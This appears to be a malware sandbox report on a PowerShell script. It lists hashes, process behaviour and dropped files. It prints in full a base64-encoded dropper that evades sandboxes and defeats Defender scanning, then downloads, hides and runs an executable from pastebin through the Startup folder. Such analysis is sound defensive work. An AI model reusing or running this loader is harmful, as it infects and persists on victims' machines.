bb5631fe2c306420573863f4bc41f4c437d5754bce1dee42bf443a535cf78a2b

General

Target

service.ps1
Size

6KB
MD5

7af1a9aee54207100217f36eafc46986
SHA1

fa6ab32d663716836910351e1dd26adc0b72f57e
SHA256

bb5631fe2c306420573863f4bc41f4c437d5754bce1dee42bf443a535cf78a2b
SHA512

7c4ded546f07782d517912a557de59fc21b7cb045a8ed4535e6023c465431d8fef07c9d0f210a65482a4504e74e778cc7db16034df289534eea50d01a7d21377
SSDEEP

192:cHWG00JrEXeapzWZAleAlWO9W27dSCSsz77H7XkuS3Wn3UR/Ypcte:htErzapiZA0AEOccSRurkd31/Yite

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3520	powershell.exe
3520	powershell.exe
1436	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3520 wrote to memory of 1436	3520	powershell.exe	85
PID 3520 wrote to memory of 1436	3520	powershell.exe	85

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\service.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAgACAAIAAjAC0AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMALQAjAAoAIAAjAC0AIw AgACAAIABzAGMAcgBpAHAAdAAgAGIAeQAgAGEAdgBpAHIAbwBsACAAXgBfAF4AIAAgACAAIwAtACMACgAgACAAIAAjAC0AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMALQAjAAoACgAkAGMAdQByAHIAZQBuAHQAUAByAGkAbgBjAGkAcABhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAAoAaQBmACAAKAAgACQAYwB1AHIAcgBlAG4AdABQAHIAaQBuAGMAaQBwAGEAbAAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdADoAOgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACkAIAApAAoAewAKAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgBUAGgAZQAgAGMAbwBuAGQAaQB0AGkAbwBuACAAdwBhAHMAIAB0AHIAdQBlACIACgB9AAoAZQBsAHMAZQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAIABIAGEAdgBlACAAbgBvACAAYQBkAG0AaQBuACAAcgBpAGcAaAB0AHMAIgAKAHMAbABlAGUAcAAgADUACgBlAHgAaQB0AAoAfQAKACQAbQBhAG4AdQBmAGEAYwB0AHUAcgBlAHIAIAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAdwBpAG4AMwAyAF8AYwBvAG0AcAB1AHQAZQByAHMAeQBzAHQAZQBtACkALgBtAGEAbgB1AGYAYQBjAHQAdQByAGUAcgAKACQAbQBvAGQAZQBsAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAB3AGkAbgAzADIAXwBjAG8AbQBwAHUAdABlAHIAcwB5AHMAdABlAG0AKQAuAG0AbwBkAGUAbAAKACQAYgBpAG8AcwB2AGUAcgBzAGkAbwBuACAAPQAgACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAHcAaQBuADMAMgBfAGIAaQBvAHMAKQAuAHYAZQByAHMAaQBvAG4ACgBpAGYAIAAoACQAbQBvAGQAZQBsACAALQBtAGEAdABjAGgAIAAiAFYAaQByAHQAdQBhAGwAIABNAGEAYwBoAGkAbgBlACIAKQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUAIABSAHUAbgBuAGkAbgBnACAAbwBuACAATQBpAGMAcgBvAHMAbwBmAHQAIABWAGkAcgB0AHUAYQBsAGkAegBhAHQAaQBvAG4AIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBlAHgAaQB0AAoAfQAKAGUAbABzAGUAaQBmACAAKAAkAG0AbwBkAGUAbAAgAC0AbQBhAHQAYwBoACAAIgBWAE0AdwBhAHIAZQAgAFYAaQByAHQAdQBhAGwAIABQAGwAYQB0AGYAbwByAG0AIgApAAoAewAKAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgBWAGkAcgB0AHUAYQBsACAATQBhAGMAaABpAG4AZQAgAGkAcwAgAFIAdQBuAG4AaQBuAGcAIABvAG4AIABWAE0AdwBhAHIAZQAgAFYAaQByAHQAdQBhAGwAIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBlAHgAaQB0AAoAfQAKAGUAbABzAGUAaQBmACAAKAAkAG0AbwBkAGUAbAAgAC0AbQBhAHQAYwBoACAAIgBWAGkAcgB0AHUAYQBsAEIAbwB4ACIAKQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUAIABpAHMAIABSAHUAbgBuAGkAbgBnACAAbwBuACAAVgBpAHIAdAB1AGEAbABCAG8AeAAiAAoAcwBsAGUAZQBwACAANQAKAGUAeABpAHQACgB9AAoAZQBsAHMAZQBpAGYAIAAoACQAbQBvAGQAZQBsACAALQBtAGEAdABjAGgAIAAiAFgAZQBuACIAKQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAVABoAGkAcwAgAE0AYQBjAGgAaQBuAGUAIABpAHMAIABWAGkAcgB0AHUAYQBsACAAbwBuACAAWABlAG4AIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBlAHgAaQB0AAoAfQAKAGUAbABzAGUAaQBmACAAKAAkAG0AbwBkAGUAbAAgAC0AbQBhAHQAYwBoACAAIgBRAEUATQBVACIAKQAKAHsACgBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACIAVABoAGkAcwAgAE0AYQBjAGgAaQBuAGUAIABpAHMAIABWAGkAcgB0AHUAYQBsACAAbwBuACAASwBWAE0AIABQAGwAYQB0AGYAbwByAG0AIgAKAHMAbABlAGUAcAAgADUACgBlAHgAaQB0AAoAfQAKAGUAbABzAGUAaQBmACAAKAAkAG0AbwBkAGUAbAAgAC0AbQBhAHQAYwBoACAAIgBHAG8AbwBnAGwAZQAiACkACgB7AAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAFQAaABpAHMAIABNAGEAYwBoAGkAbgBlACAAaQBzACAAVgBpAHIAdAB1AGEAbAAgAG8AbgAgAEcAbwBvAGcAbABlACAAQwBsAG8AdQBkACIACgBzAGwAZQBlAHAAIAA1AAoAZQB4AGkAdAAKAH0ACgAkAHYAZQByAHMAaQBvAG4APQBHAGUAdAAtAEMAbwBtAHAAdQB0AGUAcgBJAG4AZgBvAHwAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AZQB4AHAAYQBuAGQAIABPAHMATgBhAG0AZQAKAGkAZgAgACgAJAB2AGUAcgBzAGkAbwBuACAALQBtAGEAdABjAGgAIAAnADEAMAAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAGkAZgAgACgAJAB2AGUAcgBzAGkAbwBuACAALQBtAGEAdABjAGgAIAAnADEAMQAnACkACgB7AAoAIABlAGMAaABvACAAJwBOAG8AdABoAGkAbgBnACAAdABvACAAZABvACEAJwAKAH0ACgBlAGwAcwBlAAoAewAKACAAZQB4AGkAdAAKAH0ACgAkAHUAcgBpAD0AKAAnAGgAJwArACcAdAB0ACcAKwAnAHAAJwArACcAcwA6ACcAKwAnAC8ALwAnACsAJwBwAGEAcwB0AGUAJwArACcAYgBpAG4AJwArACcALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKwAnAHIAYQB3ACcAKwAnAC8AJwArACIAVABzAEcAawBHAEMAeQBFACIAKQAKACQAcgBhAHcAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAHUAcgBpACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwAKACQAcgBhAHcALgBDAG8AbgB0AGUAbgB0AAoAaQBmACAAKAAnAGUAcgByAG8AcgAnACAALQBlAHEAIAAkAHIAYQB3AC4AYwBvAG4AdABlAG4AdAApAAoAewAKACAAZQB4AGkAdAAKAH0ACgAjACQAbgB1AG0AYgBlAHIAMQA9AEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAG0AYQB4AGkAbQB1AG0AIAAnADkAJwAKACMAJABuAHUAbQBiAGUAcgAyAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBhAHgAaQBtAHUAbQAgACcAOQAnAAoAIwAkAGMAaABhAHIAYQBjAHQAZQByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AaQBuAHAAdQB0AG8AYgBqAGUAYwB0ACAAJwBBACcALAAnAGEAJwAsACcAQgAnACwAJwBiACcALAAnAEMAJwAsACcAYwAnACwAJwBEACcALAAnAGQAJwAsACcARQAnACwAJwBlACcALAAnAEYAJwAsACcAZgAnACwAJwBHACcALAAnAGcAJwAsACcASAAnACwAJwBoACcALAAnAEkAJwAsACcAaQAnACwAJwBKACcALAAnAGoAJwAsACcASwAnACwAJwBrACcALAAnAEwAJwAsACcAbAAnACwAJwBNACcALAAnAG0AJwAsACcATgAnACwAJwBuACcALAAnAE8AJwAsACcAbwAnACwAJwBQACcALAAnAHAAJwAsACcAUQAnACwAJwBxACcALAAnAFIAJwAsACcAcgAnACwAJwBTACcALAAnAHMAJwAsACcAVAAnACwAJwB0ACcALAAnAFUAJwAsACcAdQAnACwAJwBWACcALAAnAHYAJwAsACcAVwAnACwAJwB3ACcALAAnAFgAJwAsACcAeAAnACwAJwBZACcALAAnAHkAJwAsACcAWgAnACwAJwB6ACcACgAkAHAAYQB0AGgAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAKwBTAHAAZQBjAGkAYQBsAEYAbwBsAGQAZQByAF0AOgA6AFMAdABhAHIAdAB1AHAAKQAKAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAHAAYQB0AGgAIAAkAHAAYQB0AGgACgAjACQAbgBhAG0AZQA9ACcAdABtAHAAJwArACgAJABuAHUAbQBiAGUAcgAxACkAKwAoACQAYwBoAGEAcgBhAGMAdABlAHIAKQArACgAJABuAHUAbQBiAGUAcgAyACkAKwAnAC4AZQB4AGUAJwAKACQAbgBhAG0AZQA9ACcAYwBzAHIAcwBzAC4AZQB4AGUAJwAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAEUAeAB0AGUAbgBzAGkAbwBuACAAIgBlAHgAZQAiAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQB1AHIAaQAgACQAcgBhAHcALgBjAG8AbgB0AGUAbgB0ACAALQBvAHUAdABmAGkAbABlACAAJABuAGEAbQBlAAoAQwA6AFwAPwA/AD8APwA/AD8APwBcAD8APwA/AD8APwA/ADMAMgBcAGEAPwA/AHIAaQBiAC4APwA/AD8AIAArAHMAIAArAGgAIAAkAG4AYQBtAGUACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAuAFwAJABuAGEAbQBlAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1436

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
25d7ac29d798600ddc5fd880b162958b

SHA1
a2ba91e14155cfa5c26670e17ac606f3f28b0be2

SHA256
3c6d5ecae46dd9f6756e444bc51635cdd9696f3ed9fe0601cf41059a04085f88

SHA512
d91a9028c0fdf3761edbccddaa460573281b7d390efc7dfe3ebef46ce5ede53d36a7148c523e312b5daedc91c11cdb2cc8d0f8b475339cd35dba044595778d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yq0kmtka.tkd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3520-143-0x00000214251E0000-0x00000214251F0000-memory.dmp

Filesize
64KB

Download
memory/3520-144-0x00000214251E0000-0x00000214251F0000-memory.dmp

Filesize
64KB

Download
memory/3520-142-0x0000021427E50000-0x0000021427E72000-memory.dmp

Filesize
136KB

Download
memory/3520-145-0x00000214251E0000-0x00000214251F0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads